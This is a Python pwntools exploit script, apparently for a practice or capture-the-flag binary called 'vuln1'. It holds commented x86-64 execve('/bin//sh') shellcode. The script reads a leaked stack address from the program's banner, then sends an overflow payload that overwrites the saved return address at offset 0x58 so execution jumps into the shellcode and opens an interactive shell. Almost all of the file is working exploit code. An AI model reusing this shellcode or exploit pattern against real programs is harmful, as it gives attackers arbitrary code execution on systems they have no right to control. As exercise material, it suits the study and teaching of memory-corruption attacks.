#!/usr/bin/env python3
# pylint: skip-file
from pwn import *
# Target binary. Loading it into pwntools' context makes asm()/p64() below
# use its architecture and pointer width (x86-64, going by the rax/rsp/syscall
# code in SHELLCODE).
NAME: str = 'vuln1'
context.binary = ELF(NAME)
# execve(path='/bin//sh', argv=['sh'], envp=0)
# x86-64 execve shellcode in pwntools shellcraft style. Walk-through (the
# stack grows down, so each push lands below the previous one):
#   push 0x68; mov rax, 0x732f2f2f6e69622f; push rax
#       -> "/bin///s" + "h\0" at rsp, i.e. "/bin///sh\0" (the header comment
#          says '/bin//sh'; the extra slash is harmless to the kernel).
#   mov rdi, rsp                         -> rdi = path
#   push 0x1010101 ^ 0x6873; xor dword ptr [rsp], 0x1010101
#       -> "sh\0" on the stack without a NUL byte appearing in the code.
#   xor esi, esi; push rsi               -> argv[1] = NULL
#   push 8; pop rsi; add rsi, rsp; push rsi
#       -> rsi = rsp + 8 = &"sh", pushed as argv[0]
#   mov rsi, rsp                         -> rsi = argv
#   xor edx, edx                         -> envp = NULL
#   push SYS_execve; pop rax; syscall    -> execve(2), rax = 0x3b
# NOTE(review): this is a non-raw """...""" literal, so the '\x00' inside the
# /* ... */ assembler comments is a real NUL byte in the source handed to
# asm(). The script presumably assembled fine as written; if asm() ever chokes
# on it, an r"""...""" literal keeps the comment text literal. The NUL-free
# encoding of the code itself only matters if the buffer is filled by a
# string function rather than a sized read() -- verify against the binary.
SHELLCODE: str = """
push 0x68
mov rax, 0x732f2f2f6e69622f
push rax
mov rdi, rsp
/* push argument array ['sh\x00'] */
/* push b'sh\x00' */
push 0x1010101 ^ 0x6873
xor dword ptr [rsp], 0x1010101
xor esi, esi /* 0 */
push rsi /* null terminate */
push 8
pop rsi
add rsi, rsp
push rsi /* 'sh\x00' */
mov rsi, rsp
xor edx, edx /* 0 */
/* call execve() */
push SYS_execve /* 0x3b */
pop rax
syscall
"""
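def main() -> None:
    """Exploit vuln1: leak the name buffer's address, then return into it.

    Sequence against the binary's prompts:
      1. Banner: the second line leaks ``&name`` as ``... 0x<hex>``; the
         third line (a function address) is consumed and ignored.
      2. Set an initial name so the ``update`` path can be exercised.
      3. ``update``: overwrite the name buffer with the shellcode, filler up
         to the saved return address at offset 0x58, and the leaked buffer
         address in that slot.
      4. ``exit``: the vulnerable function returns into the shellcode.

    The runtime leak makes this independent of ASLR, but the stack must be
    executable for the jump into the buffer to survive.

    Raises:
        RuntimeError: if the banner line does not carry a parseable ``0x``
            address (a changed banner used to surface as a bare IndexError).
        ValueError: if the assembled shellcode does not fit before the
            return-address slot -- the original silently produced empty
            padding and a misplaced return address in that case.
    """
    ret_offset = 0x58  # bytes from the start of `name` to the saved RIP

    p = process(context.binary.path)

    # Read the banner and parse the free info: line 2 leaks &name.
    p.readline()
    name_line = p.readline()
    try:
        name_addr = int(name_line.split(b'0x')[1].decode('utf-8').strip(), 16)
    except (IndexError, ValueError) as err:
        raise RuntimeError(
            f'could not parse &name from banner line {name_line!r}') from err
    p.readline()  # function address line; not needed for this exploit
    log.warning(f'&name: {name_addr:016x}')

    # Set initial name.
    p.recvuntil(b'> ')
    p.sendline(b'andreas')

    # Stage the payload: shellcode at the buffer start, filler up to the saved
    # return address, then the buffer address so `ret` lands on the shellcode.
    p.sendline(b'update')
    shellcode = asm(SHELLCODE)
    if len(shellcode) > ret_offset:
        raise ValueError(
            f'shellcode is {len(shellcode)} bytes, which exceeds the '
            f'{ret_offset:#x}-byte window before the return address')
    payload = shellcode + b'A' * (ret_offset - len(shellcode)) + p64(name_addr)
    log.info('sending payload:')
    log.info(hexdump(payload))
    # send(), not sendline(), as in the original: the 8-byte return address is
    # the last thing written and no newline is appended after it. Keep it that
    # way unless the binary's read is confirmed to tolerate trailing bytes.
    p.send(payload)
    p.recvuntil(b'> ')

    # Return from the vulnerable function into the buffer.
    p.sendline(b'exit')
    log.warning('Enjoy your shell!')
    p.interactive()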
# Script entry point: running this file directly launches the exploit; importing
# it only defines main() and the shellcode.
if __name__ == '__main__':
    main()